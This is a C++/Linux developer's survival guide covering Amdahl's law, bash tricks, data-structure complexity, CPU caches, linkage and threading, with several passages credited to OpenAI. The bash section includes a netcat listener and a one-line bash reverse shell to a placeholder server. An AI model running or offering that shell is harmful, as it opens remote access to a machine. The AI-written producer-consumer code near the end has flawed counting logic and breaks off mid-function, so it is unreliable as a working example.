Teach yourself C++ in 45 years

A Computer Science survival guide for C++/Linux developers

Dean Turpin

Fri Jun 14 22:05:51 UTC 2024

Foreword

An ode to C++

Let’s start with a haiku written by a computer.

Compiling code runs
C++ language flows strong
Programs come to life

This reference is a distillation of 15+ years of online logbook notes down to only the essentials that remain relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevent me from focusing all my attention on the first few chapters.

If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.


Parallelism

Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.

Kinds of parallelism

The iron law of performance

See wikipedia.

time/program = (instructions/program) * (clockCycles/instruction) * (time/clockCycle)

Amdahl’s law

Amdahl’s law is a principle in computer architecture that describes the potential speedup of a system when only part of it is improved. It was developed by computer scientist Gene Amdahl in 1967 and is often used to evaluate the impact of parallel processing on overall system performance.

The law states that the overall speedup of a system is limited by the portion of the system that cannot be parallelized or improved. This portion is often referred to as the "serial" or "sequential" part of the system. In other words, even if a system’s parallel processing capabilities are improved, the overall speedup will be limited by the sequential portion of the system.

Mathematically, Amdahl’s law can be expressed as:

S(n) = 1 / (α + (1 - α)/n)

Where:

  - S(n) is the speedup achieved using n processors
  - α is the proportion of the work that is serial (cannot be parallelized)
  - (1 - α) is the proportion that can be parallelized

This formula shows that as the number of processors (n) increases, the speedup achieved by parallel processing approaches a maximum value of 1/α. This means that even with an infinite number of processors, the speedup will never be greater than 1/α.

Amdahl’s law highlights the importance of optimizing the sequential portion of a system in order to achieve maximum speedup. It also serves as a reminder that adding more processors to a system may not always result in significant performance gains if the sequential portion is not improved.

In practical terms, Amdahl’s law can be used to determine the potential speedup of a system before investing time and resources into parallelizing it. It can also be used to identify which portions of a system should be prioritized for optimization in order to achieve the greatest overall speedup.

It’s very tempting to optimise the parts you are familiar with, but it’s not obvious how much your efforts will benefit the overall process. Spend your time on the bottlenecks.
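
To make the limit concrete, here’s a minimal sketch (my own illustration, not from the notes) that evaluates the formula for a workload that is 10% serial: no matter how many processors you add, the speedup never exceeds 10x.

#include <iostream>

// Amdahl's law: speedup with n processors when a fraction
// "serial" of the work cannot be parallelised
constexpr double amdahl(const double serial, const double n) {
    return 1.0 / (serial + (1.0 - serial) / n);
}

int main() {
    // 10% serial work caps the speedup at 1/0.1 = 10x
    for (const auto n : {1.0, 2.0, 8.0, 64.0, 1e6})
        std::cout << "n=" << n << " speedup=" << amdahl(0.1, n) << '\n';
}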


bash

As a Linux developer you need a strong command line game. bash is ubiquitous, and a powerful language in itself, without resorting to something like Python.

git

git is awesome on the command line and pretty much essential. Use it to manage your chores. See how to undo almost anything with git.

Send a string to an IP/port

(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80

Reverse shell

# server
nc -knvlp 3389

# client
bash -i >& /dev/tcp/server_ip/3389 0>&1

Target everything but one file

git add !(unit.md)

Pick a random line from a file

shuf -n 1 readme.txt

From bash 5 you can read the epoch directly:

echo $EPOCHREALTIME
1614870873.574544

echo $EPOCHSECONDS
1614870876

uptime

The three load average values are 1, 5 and 15 minutes.

uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51

stress

Stress your system in different ways.

stress --cpu 8
echo $(nproc)

Synonyms for localhost

localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut

Move a file out of the way

mv {,_}.bash_history

Repeat a command

watch -d ip a

pushd equivalent

I use this all the time. Rather than pushd and popd to navigate around the file system:

# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post

# Return whence you came
cd -

Hash functions

A hash function is a mathematical function that takes in data of any size and converts it into a fixed-size output, also known as a hash value or hash code. This output is usually a string of numbers and letters that serves as a unique digital fingerprint for the input data. Hash functions are commonly used in computer science for data storage, data retrieval, and data verification. They are also used in cryptography to secure data and in data structures such as hash tables for efficient data lookup. A good hash function should be deterministic, meaning that the same input will always produce the same output, and it should be computationally efficient, meaning that it should be quick to compute the hash value for any given input.

Properties of a hashing algorithm

String hashing
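
As an illustration (my own sketch, not from the original notes), a minimal FNV-1a string hash: simple, fast and non-cryptographic, and a one-character change to the input produces a completely different value.

#include <cstdint>
#include <iostream>
#include <string_view>

// FNV-1a: XOR each byte into the hash, then multiply by the FNV prime
constexpr std::uint64_t fnv1a(const std::string_view s) {
    std::uint64_t hash = 0xcbf29ce484222325ull; // FNV offset basis
    for (const auto c : s) {
        hash ^= static_cast<std::uint8_t>(c);
        hash *= 0x100000001b3ull; // FNV prime
    }
    return hash;
}

int main() {
    std::cout << fnv1a("hello") << '\n';
    std::cout << fnv1a("hello!") << '\n'; // very different hash
}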


Complexity

You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.

Complexity Description
O(1) Constant time
O(log n) Logarithmic time
O(n) Linear time
O(n log n) Linearithmic time
O(n^2) Quadratic time
O(n^3) Cubic time
O(2^n) Exponential time
O(n!) Factorial time

Comparing two fundamental data structures

The average complexity of linked lists and arrays varies depending on the specific operations being performed on them. However, in general, linked lists and arrays have different average complexities for different operations.

  1. Accessing Elements: The average complexity of accessing an element in an array is O(1) as the elements are stored in contiguous memory locations, making it easy to access a specific element using its index. On the other hand, the average complexity of accessing an element in a linked list is O(n) as it requires traversing the list from the head or tail to the desired element.

  2. Insertion/Deletion at the ends: Inserting or deleting an element at the beginning of an array is O(n), as all subsequent elements must be shifted; appending to the end of a dynamic array is amortized O(1). Inserting or deleting at the head of a linked list is O(1); at the tail it is O(1) only if the list keeps a tail pointer (and, for deletion, is doubly linked), otherwise O(n).

  3. Insertion/Deletion in the middle: Inserting or deleting an element in the middle of an array has an average complexity of O(n) as it requires shifting all the subsequent elements. In a linked list, the average complexity is O(n) as it requires traversing the list to the desired position.

  4. Searching: The average complexity of searching for an element in an unsorted array is O(n) as all the elements need to be checked. In a linked list, the average complexity is also O(n) as it requires traversing the list to find the desired element.

Overall, the average complexity of linked lists and arrays depends on the specific operations being performed. However, in general, arrays have a lower average complexity for accessing elements, while linked lists have a lower average complexity for inserting/deleting elements. Both have the same average complexity for searching.


Data structures

It’s important to know the common data structures and their characteristics.

  1. Arrays
  2. Linked Lists
  3. Stacks
  4. Queues
  5. Trees
  6. Graphs
  7. Hash Tables
  8. Heaps
  9. Tries
  10. Sets
  11. Maps
  12. Dictionaries
  13. Bags
  14. Deques
  15. Priority Queues

std::vector

std::vector is the go-to container, so let’s give it some special attention. It has contiguous storage – therefore cache friendly – and uses the RAII paradigm: the data are created on the heap and the allocation and deallocation (new/delete) are handled for you. Interestingly, std::string exhibits many of the same characteristics, but it’s not quite containery enough to qualify.

How does my vector grow?

Estimate how many times the fax destructor is called below.

#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
    struct fax {

        // Constructor and destructor
        fax() { std::cout << x << " ctor\n"; }
        ~fax() { std::cout << "\t" << x << " dtor\n"; }

        // Copy constructors
        fax(const fax&) { std::cout << x << " copy ctor\n"; };
        fax(fax&&) { std::cout << x << " move ctor\n"; };

        // Assignment constructors
        fax& operator=(const fax&) {
            std::cout << x << " copy assignment ctor\n";
            return *this;
        }
        fax& operator=(fax&&) {
            std::cout << x << " move assignment ctor\n";
            return *this;
        };

        const size_t id = x++;
    };

    std::vector<fax> y;

    // Reduce copies by allocating up front
    // y.reserve(3);

    for (size_t i = 0; i < 3; ++i) {
        y.push_back(fax{});
        std::cout << "-- capacity " << y.capacity() << " --\n";
    }

    // fax f1 = fax{};
    // fax f2 = std::move(fax{});
}

See the program output below; note how the capacity grows exponentially (doubling each time).

1 ctor
2 move ctor
    2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
    5 dtor
    5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
    9 dtor
    9 dtor
    9 dtor
-- capacity 4 --
    9 dtor
    9 dtor
    9 dtor

For each push we call the default constructor to create a temporary object and then the move constructor to populate the new element with its data… so far so good. But crucially, when the vector is resized we must also copy all of the existing elements into the new allocation (copied rather than moved here, because the move constructor is not declared noexcept). Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead; also, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.

Binary search trees

Binary search trees offer O(log n) search, insertion and deletion on average, provided the tree is balanced. Worst case, if the tree is unbalanced, they degrade to O(n). std::set and std::map are implemented using a red-black tree, a type of self-balancing binary search tree. C++23 introduces std::flat_map, which is implemented using contiguous storage to make it more cache-friendly.

A binary search tree is a data structure that is used to store and organize data in a hierarchical manner. It is a type of binary tree, which means that each node has at most two child nodes. The nodes in a binary search tree are organized in a specific way – the left child node of a parent node is always smaller than the parent node, and the right child node is always greater than the parent node.

This organization of nodes makes it easy to search for a specific value in the tree. Starting at the root node, the search algorithm compares the value being searched for to the value in the current node. If the value is smaller, the algorithm moves to the left child node. If the value is larger, the algorithm moves to the right child node. This process continues until the value is found or the algorithm reaches a leaf node (a node with no children).

Binary search trees also have efficient insertion and deletion operations. When inserting a new value into the tree, the algorithm compares the value to the current node and decides whether it should be placed as a left or right child node. This process continues until the value is inserted into the correct position.

Deletion in a binary search tree can be done in three different cases: deleting a leaf node, deleting a node with one child, and deleting a node with two children. In each case, the algorithm rearranges the tree to maintain the binary search tree property.

Overall, binary search trees are efficient data structures for storing and retrieving data in a sorted manner. However, they can become unbalanced if the data is not inserted in a balanced manner, which can affect the performance of search operations. To maintain balance, various balance techniques such as AVL trees and red-black trees can be used.

Self-balancing binary search trees

A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the leftmost node is the smallest and the rightmost node is the largest.

Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.

e|            /e          
d|           d            
c|          / \c          
b|         b              
a|        / \ /a          
9|-----  /   9            
8|      /     \8          
7|     7                  
6|      \     /6          
5|-----  \   5            
4|        \ / \4          
3|         3              
2|          \ /2          
1|           1            
0|            \0          

Hash tables

Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of occupied slots – known as the “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.

std::unordered_set and std::unordered_map are implemented using hash tables.
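
A small sketch (mine) showing the load factor at work: as elements are inserted into a std::unordered_map, the table is rehashed into more buckets whenever the load factor would exceed max_load_factor().

#include <iostream>
#include <unordered_map>

int main() {
    std::unordered_map<int, int> m;
    auto buckets = m.bucket_count();

    for (int i = 0; i < 1000; ++i) {
        m[i] = i;

        // Report each rehash: more buckets, and the load factor drops back down
        if (m.bucket_count() != buckets) {
            buckets = m.bucket_count();
            std::cout << m.size() << " elements, " << buckets
                      << " buckets, load factor " << m.load_factor() << '\n';
        }
    }
}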

Heaps

A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.

The underlying container must support random access iterators so the heap structure can be maintained internally at all times. A sorted list is also a valid min heap (although a heap is not, in general, sorted).

123456789abcdef
1
23
4567
89abcdef

Projected down, the top of the tree is the smallest element.

       1
   2       3
 4   5   6   7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f
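
A brief sketch (my own) using the Standard Library heap algorithms; std::priority_queue wraps the same operations.

#include <algorithm>
#include <iostream>
#include <vector>

int main() {
    std::vector<int> v{3, 1, 4, 1, 5, 9, 2, 6};

    // Arrange the elements into a max heap: v.front() is the largest
    std::make_heap(v.begin(), v.end());
    std::cout << "max " << v.front() << '\n';

    // pop_heap moves the largest to the back; pop_back removes it
    std::pop_heap(v.begin(), v.end());
    v.pop_back();
    std::cout << "next " << v.front() << '\n';
}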

Comparison of heaps and binary search trees

A heap is a data structure that is typically implemented as an array and follows the heap property, which states that the parent node must be either greater than or equal to (for a max heap) or less than or equal to (for a min heap) its child nodes. This structure is used for efficient access to the maximum (or minimum) element in the data, making it useful for priority queues.

On the other hand, a binary search tree (BST) is a data structure that is organized as a binary tree, with each node having at most two child nodes (left and right). The BST follows the property that all nodes in the left subtree of a node are less than the node, and all nodes in the right subtree are greater than the node. This structure is used for efficient searching, insertion, and deletion of elements in sorted order.

In summary, the main differences between a heap and a binary search tree are:

  1. Structure: A heap is typically implemented as an array, while a binary search tree is organized as a binary tree.

  2. Heap property vs. BST property: A heap follows the heap property, while a binary search tree follows the BST property.

  3. Ordering of elements: In a heap, the parent node is either greater than or equal to its child nodes, while in a binary search tree, the left subtree contains elements smaller than the node, and the right subtree contains elements greater than the node.

  4. Purpose: A heap is typically used for efficient access to the maximum or minimum element, while a binary search tree is used for efficient searching, insertion, and deletion of elements in sorted order.

Singly linked lists

Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list (unless you also keep a tail pointer), therefore O(n). Searching is also O(n).

std::forward_list is a singly linked list.

Doubly linked lists

Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).

std::list is a doubly linked list.

C++ Standard Library container complexities

Container Type Average Case Time Complexity Worst Case Time Complexity
Vector O(1) O(n)
List O(1) O(n)
Deque O(1) O(n)
Set O(log n) O(n)
Map O(log n) O(n)
Multiset O(log n) O(n)
Multimap O(log n) O(n)
Unordered_set O(1) O(n)
Unordered_map O(1) O(n)
Unordered_multiset O(1) O(n)
Unordered_multimap O(1) O(n)
Stack O(1) O(n)
Queue O(1) O(n)
Priority_queue O(log n) O(n)
Bitset O(1) O(1)

However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.


Caches

A cache is a small amount of unusually fast memory.

A modern multi-core machine will have a multi-level cache hierarchy, where the faster and smaller caches belong to individual processors. When one processor modifies a value in its cache, other processors cannot use the old value any more; and that memory location will be invalidated in all of the caches. Furthermore, since caches operate on the granularity of cache lines and not individual bytes, the entire cache line will be invalidated in all caches.

OpenAI: Processor caches are small, high-speed memory units that are located on the processor itself. They are used to temporarily store frequently used data and instructions to speed up the processor’s performance. There are typically three levels of processor caches: L1, L2, and L3.

L1 cache is the smallest and fastest cache, with a capacity of a few kilobytes. It is directly integrated into the processor core and operates at the same speed as the processor. L1 cache is divided into two parts: instruction cache and data cache. The instruction cache stores frequently used instructions, while the data cache stores frequently accessed data.

L2 cache is larger than L1 cache and is also located on the processor chip. Its capacity can range from a few hundred kilobytes to a few megabytes. L2 cache is slower than L1 cache, but still operates at a much faster speed than main memory. It acts as a middleman between the L1 cache and main memory, storing data and instructions that are not currently in the L1 cache.

L3 cache is the largest of the three levels and is located either on the processor chip or on a separate chip on the motherboard. Its capacity can range from a few megabytes to tens of megabytes. L3 cache is slower than L2 cache, but still faster than main memory. It acts as a backup for the L1 and L2 caches, storing data and instructions that are not frequently used.

The use of processor caches greatly improves the performance of a computer system by reducing the time it takes for the processor to retrieve data and instructions from main memory. This is because the processor can access data and instructions from the caches much faster than it can from main memory. Additionally, the caches also help to reduce the amount of traffic on the system bus, allowing for more efficient communication between the processor and main memory.

Cache consistency

A multiprocessor is cache consistent if all writes to the same memory location are performed in some sequential order.

Cache coherence

OpenAI: Cache coherence is a property of a multi-core computer system that ensures that updates to shared data in the cache of one processor are propagated to the cache of all other processors in a timely manner. This ensures that all processors in the system have consistent and up-to-date data, even when multiple processors are accessing and modifying the same data.

In a multi-core system, each processor has its own cache memory that stores frequently used data for faster access. When multiple processors access the same data, there is a possibility that one processor may have a different version of the data in its cache than another processor. This can lead to data inconsistencies and errors.

Cache coherence protocols are used to manage the shared data and ensure that all processors have the most recent version of the data. These protocols use various techniques such as snooping, directory-based schemes, and shared bus architectures to maintain data consistency.

Snooping is a commonly used technique where each processor monitors the bus for any updates to shared data. If a processor detects that another processor has modified a shared data item, it will invalidate its own copy of the data and fetch the updated version from the main memory or the other processor’s cache.

Directory-based schemes use a centralized directory that keeps track of which processor has a valid copy of a shared data item. When a processor wants to access a shared data item, it first checks the directory to determine which processor has the most recent version. If another processor has the data, the requesting processor can fetch the data from that processor’s cache.

Shared bus architectures use a shared communication bus to transfer data between processors. Each processor has its own cache, but they all share a common bus to access the main memory. This allows for direct communication between processors and ensures that all processors have consistent data.

Cache coherence is essential in multi-core systems to maintain data consistency and prevent errors. Without it, the performance and reliability of the system could be severely impacted.

MESI cache coherence protocol

Each cache line has a state (Modified, Exclusive, Shared or Invalid), a tag and the data.

Snooping

See bus snooping.

Directory based coherence

Used for large CPUs.

See wiki.

Write-back versus write-through

All Intel-compatible CPUs of the last one or two decades have used a write-back strategy for caches (which presumes fetching a cache line first to allow partial writes). Of course that’s the theory; reality is slightly more complex.

Cache misses

There are three kinds of cache misses:

  1. Instruction read miss
  2. Data read miss
  3. Data write miss

OpenAI: A cache miss occurs when the processor or CPU tries to access data from the cache memory, but the requested data is not found in the cache. This means that the data must be retrieved from a slower, larger memory source, such as the main memory or hard drive.

Cache misses can significantly impact the performance of a system because accessing data from the main memory or hard drive is much slower compared to accessing data from the cache. This delay in retrieving data can cause a delay in processing instructions and can result in slower overall performance.

Cache misses can occur for various reasons, such as:

  1. Compulsory miss: This occurs when the requested data is being accessed for the first time and is not yet present in the cache.

  2. Capacity miss: This occurs when the cache is full and cannot hold any more data, causing the data to be evicted from the cache and requiring it to be retrieved from the main memory.

  3. Conflict miss: This occurs when the requested data was recently in the cache but has been evicted because another address mapped to the same cache set (a consequence of the cache’s mapping function), so it must be fetched from the main memory again.

Cache misses can also be caused by poorly written code or inefficient algorithms that lead to frequent and unnecessary data access requests, resulting in a higher number of cache misses. To improve system performance, programmers and developers need to optimize their code and reduce the number of cache misses.

Data cache

Instruction cache

Virtual functions

The way virtual functions work may cause issues with caching.

  1. Load vtable pointer: potentially data cache miss
  2. Load virtual function pointer: potentially data cache miss
  3. Then code of function is called: potential instruction cache miss

But we may be able to use CRTP to avoid the first two.

CRTP

The curiously recurring template pattern (CRTP) is an idiom in C++ in which a class X derives from a class template instantiation using X itself as template argument. More generally it is known as F-bound polymorphism, and it is a form of static polymorphism.

#include <iostream>

// Base class template using CRTP
template<typename Derived>
class Base {
public:
    void foo() {
        static_cast<Derived*>(this)->fooImpl();
    }
};

// Derived class using CRTP
class Derived : public Base<Derived> {
public:
    void fooImpl() {
        // Implementation of foo specific to Derived
        std::cout << "Hello from Derived!" << std::endl;
    }
};
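
A brief usage sketch (my addition): the call is resolved at compile time, so there is no vtable pointer or indirect call involved.

int main() {
    Derived d;
    d.foo(); // statically dispatched to Derived::fooImpl()
}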

Cache performance evaluate

Cache associativity

Cache oblivious algorithm design

Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.

Profiling

Data-oriented design

Design to get the most value out of every single cacheline that is read. Split apart the functions and data.

CPI_stall contributors

Cache locality

Cache locality refers to the principle of keeping frequently accessed data or instructions physically close to each other in a computer’s memory. This helps improve the performance of the system by reducing the time it takes to access data, as data can be retrieved from the nearby cache rather than from the main memory.

There are two types of cache locality: temporal locality and spatial locality. Temporal locality refers to the tendency of a program to access the same data or instructions repeatedly in a short period of time. This allows the system to keep the data in the cache, making it faster to access in subsequent requests. Spatial locality, on the other hand, refers to the tendency of a program to access data that is located near the data that was recently accessed. This allows the system to prefetch data and store it in the cache, anticipating that it will be needed soon.

Cache locality is important for efficient memory management and can significantly improve the performance of a system. It is often achieved through techniques such as caching, prefetching, and memory mapping. However, cache locality can also be negatively affected by thrashing, where the system is constantly swapping data in and out of the cache, leading to slower performance.
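
A sketch of spatial locality in action (my own example): both loops compute the same sum, but the row-major traversal touches memory sequentially while the column-major traversal strides through it and misses the cache far more often.

#include <array>
#include <chrono>
#include <cstddef>
#include <iostream>

constexpr std::size_t N = 1024;

// static so the large array lives off the stack
static std::array<std::array<int, N>, N> matrix{};

template <typename F>
void time_it(const char* label, F f) {
    const auto start = std::chrono::steady_clock::now();
    const auto result = f();
    const auto us = std::chrono::duration_cast<std::chrono::microseconds>(
        std::chrono::steady_clock::now() - start);
    std::cout << label << ": " << result << " in " << us.count() << " us\n";
}

int main() {
    // Row-major: consecutive elements, good spatial locality
    time_it("row major", [] {
        long sum = 0;
        for (std::size_t row = 0; row < N; ++row)
            for (std::size_t col = 0; col < N; ++col)
                sum += matrix[row][col];
        return sum;
    });

    // Column-major: strides of N ints per access, poor locality
    time_it("column major", [] {
        long sum = 0;
        for (std::size_t col = 0; col < N; ++col)
            for (std::size_t row = 0; row < N; ++row)
                sum += matrix[row][col];
        return sum;
    });
}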

Further watching

TLB: Translation lookaside buffer

The Translation Lookaside Buffer (TLB) is a hardware cache that is used in computer systems to improve the efficiency of virtual memory address translation. It is a small, high-speed cache that stores recently used virtual-to-physical address translations.

When a program references a memory location, the virtual memory address needs to be translated into a physical memory address by the operating system. This translation process involves looking up a page table or a similar data structure. Since this translation operation is performed frequently, it can introduce overhead and impact system performance.

The TLB acts as a cache for these translations, reducing the need for repeated lookups in the page table. It stores a subset of the most recently used translations, making it faster to access and retrieve the corresponding physical memory address.

TLBs can be shared between multiple cores or processors, or each core may have its own dedicated TLB.

OpenAI: Translation Lookaside Buffer (TLB) is a cache memory that is used to improve the efficiency of virtual memory operations. It stores recently used virtual-to-physical address translations, allowing the processor to quickly access the corresponding physical memory address without having to perform a full translation process. The TLB acts as a temporary storage for translations, reducing the time and effort required for memory access. It is typically located on the processor chip and is used in conjunction with the Memory Management Unit (MMU) to handle virtual address translations. The TLB is an important component in modern computer systems and plays a key role in improving system performance.

Memory fences

A memory fence (or barrier) is a programming language construct used to enforce an ordering constraint on memory operations issued by a thread of execution on a CPU. This typically means that operations issued prior to the fence are guaranteed to be performed before operations issued after the fence.

const int num_mailboxes = 32;
std::atomic<int> mailbox_receiver[num_mailboxes];
std::string mailbox_data[num_mailboxes];
 
// The writer threads update non-atomic shared data 
// and then update mailbox_receiver[i] as follows:
mailbox_data[i] = ...;
std::atomic_store_explicit(&mailbox_receiver[i], receiver_id, std::memory_order_release);
 
// Reader thread needs to check all mailbox[i], but only needs to sync with one.
for (int i = 0; i < num_mailboxes; ++i)
    if (std::atomic_load_explicit(&mailbox_receiver[i],
        std::memory_order_relaxed) == my_id)
    {
        // synchronize with just one writer
        std::atomic_thread_fence(std::memory_order_acquire);
        // guaranteed to observe everything done in the writer thread
        // before the atomic_store_explicit()
        do_work(mailbox_data[i]);
    }

See wiki and cppreference.

What pushes something out of the cache?

There are several factors that can push something out of the cache:

  1. Cache size limitations: Caches have a limited capacity, and if the cache becomes full, the least recently used (LRU) items are typically pushed out to make space for new entries.
  2. Cache eviction policies: Various cache eviction policies determine what gets pushed out when the cache is full. LRU (Least Recently Used) is one of the commonly used policies that evicts the oldest item that has not been accessed recently.
  3. Time-based expiration: Some caches may have a time-based expiration mechanism. If an item remains unused for a certain period of time, it can be automatically removed from the cache to make room for other data.
  4. Size-based eviction: In some cases, if the cache is designed to store items of a fixed size, new entries may replace older items when they exceed the cache’s size limit.
  5. Manual cache invalidation: Cache invalidation can be triggered manually by a programmer or system administrator. This is often done to ensure that the cache is up-to-date with the latest data, or to remove specific items from the cache.

Further reading

C++ linkage

Internal linkage refers to the visibility of a variable or function within a single source file. Variables or functions with internal linkage can only be accessed within the source file they are declared in, and cannot be accessed by other source files in the same project.

External linkage refers to the visibility of a variable or function across multiple source files in a project. Variables or functions with external linkage can be accessed by other source files in the same project, allowing for sharing and reusing of code.

In C++, variables and functions have external linkage by default, but can be declared with the keyword "static" to have internal linkage. Additionally, the "extern" keyword can be used to explicitly declare a variable or function with external linkage.

Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.

http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco

If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
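
A sketch across two translation units (the file and symbol names are mine, for illustration):

// a.cpp
static int counter = 0;   // internal linkage: visible only within a.cpp
int shared_counter = 0;   // external linkage: visible to other translation units

// b.cpp
extern int shared_counter;  // declaration referring to the definition in a.cpp
// extern int counter;      // would fail to link: no external symbol "counter"

int next() { return ++shared_counter; }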

Anonymous namespaces

Used to declare many things with internal linkage.

namespace {
  int a = 0;
  int b = 0;
  int c = 0;
}

Creating threads in C++

This is all a lot easier since std::thread was introduced in C++11. Now we have a platform-independent interface. See the C++ concurrency support library examples.

However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick, it could actually take longer to parallelise it. You need to profile: how long does it take just to create a thread?

Ways to create a thread

std::async

Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call. It’s quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: they will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine are stored in the future and rethrown when the calling code invokes get(). You ought to pass it a launch policy, std::launch::async or std::launch::deferred, as the first parameter.
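
A minimal sketch (my own) of pushing a calculation into the background and collecting the result:

#include <future>
#include <iostream>
#include <numeric>
#include <vector>

int main() {
    const std::vector<int> v(1'000'000, 1);

    // Start the summation in another thread
    auto result = std::async(std::launch::async, [&v] {
        return std::accumulate(v.cbegin(), v.cend(), 0l);
    });

    // Do other work here...

    // get() blocks until the result is ready (and rethrows any exception)
    std::cout << result.get() << '\n';
}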

std::thread

You need to call join() for every thread created with std::thread. This can be done by storing your threads as a vector and joining each of them in a loop.

std::jthread

Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.
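	
A sketch of both (my own example): the std::threads must be joined explicitly, while the std::jthread joins itself in its destructor.

#include <iostream>
#include <thread>
#include <vector>

int main() {
    // std::thread: you must join (or detach) before destruction
    std::vector<std::thread> threads;
    for (int i = 0; i < 4; ++i)
        threads.emplace_back([i] { std::cout << "thread " << i << '\n'; });

    for (auto& t : threads)
        t.join();

    // std::jthread (C++20): joins automatically when it goes out of scope
    std::jthread j([] { std::cout << "jthread done\n"; });
}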

Execution policies

Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.
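
For example (a sketch of mine; with gcc you typically also need to link against TBB, e.g. -ltbb):

#include <algorithm>
#include <execution>
#include <functional>
#include <iostream>
#include <numeric>
#include <vector>

int main() {
    std::vector<int> v(10'000'000);
    std::iota(v.begin(), v.end(), 0);

    // Sum and sort across all available cores; the policy offers no
    // protection of shared data, so the per-element work must be independent
    const auto total = std::reduce(std::execution::par, v.cbegin(), v.cend(), 0l);
    std::sort(std::execution::par, v.begin(), v.end(), std::greater{});

    std::cout << total << " largest " << v.front() << '\n';
}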

C++ algorithms that can take an execution policy

Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if.

  1. std::sort
  2. std::copy
  3. std::transform
  4. std::accumulate
  5. std::for_each
  6. std::reduce
  7. std::inclusive_scan
  8. std::exclusive_scan
  9. std::transform_reduce
  10. std::remove
  11. std::count
  12. std::max_element
  13. std::min_element
  14. std::find
  15. std::generate

Acquiring resources

std::mutex

A standard way to protect access to something, but there are multiple ways to unlock it.

Acquiring multiple resources

Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more.

You can use std::scoped_lock with multiple resources or just one; I also think it expresses intent better, by virtue of having “scope” in the name.
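
A sketch (mine) of acquiring two mutexes together: std::scoped_lock locks both using a deadlock-avoidance algorithm and releases them when it goes out of scope.

#include <mutex>
#include <thread>

std::mutex m1, m2;
int balance_a = 0, balance_b = 0;

void transfer() {
    // Both mutexes acquired together, released at the end of the scope (RAII)
    const std::scoped_lock lock{m1, m2};
    ++balance_a;
    --balance_b;
}

int main() {
    std::jthread t1{transfer};
    std::jthread t2{transfer};
}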

Standard library threading types

See the Standard Library concurrency support library.

Let’s ask OpenAI to write a producer-consumer solution in C++

Producer-Consumer Solution in C++

#include <iostream>
#include <pthread.h>
#include <semaphore.h>

// Define the buffer size
#define BUFFER_SIZE 5

// Define the maximum number of items to be produced
#define MAX_ITEMS 20

// Define mutex and semaphore
sem_t empty, full;
pthread_mutex_t mutex;

// Define buffer array
int buffer[BUFFER_SIZE];

// Define variable for tracking the number of items produced
int item_count = 0;

// Function to produce items
void *producer(void *arg) {
    int item = 1;
    while (item_count < MAX_ITEMS) {
        // Wait for an empty slot in the buffer
        sem_wait(&empty);

        // Lock the mutex before accessing the buffer
        pthread_mutex_lock(&mutex);

        // Add item to buffer
        buffer[item_count] = item;
        item_count++;

        // Print the item produced
        std::cout << "Produced item: " << item << std::endl;

        // Unlock the mutex and signal that the buffer is full
        pthread_mutex_unlock(&mutex);
        sem_post(&full);

        // Increment item
        item++;
    }
    return nullptr;
}

// Function to consume items
void *consumer(void *arg) {
    int item;
    while (true) {
        // Wait for a full slot in the buffer
        sem_wait(&full);

        // Lock the mutex before accessing the buffer
        pthread_mutex_lock(&mutex);

        // Get item from buffer
        item = buffer[item_count - 1];
        item_count--;

        // Print the item consumed
        std::cout << "Consumed item: " << item << std::endl;

        // Unlock the mutex and signal that the buffer is empty
        pthread_mutex_unlock(&mutex);
        sem_post(&empty);

        // If all items have been consumed, exit loop
        if (item_count == 0) {
            break;
        }
    }
    return nullptr;
}

int main() {
    // Initialize mutex and semaphores
    pthread_mutex_init(&mutex, NULL);
    sem_init(&empty, 0, BUFFER_SIZE);
    sem_init(&full, 0, 0);

    // Create producer and consumer threads
    pthread_t producer_thread, consumer_thread;
    pthread_create(&producer_thread, NULL, producer, NULL);
    pthread_create(&consumer_thread, NULL, consumer, NULL);

    // Join threads
    pthread_join(producer_thread, NULL);
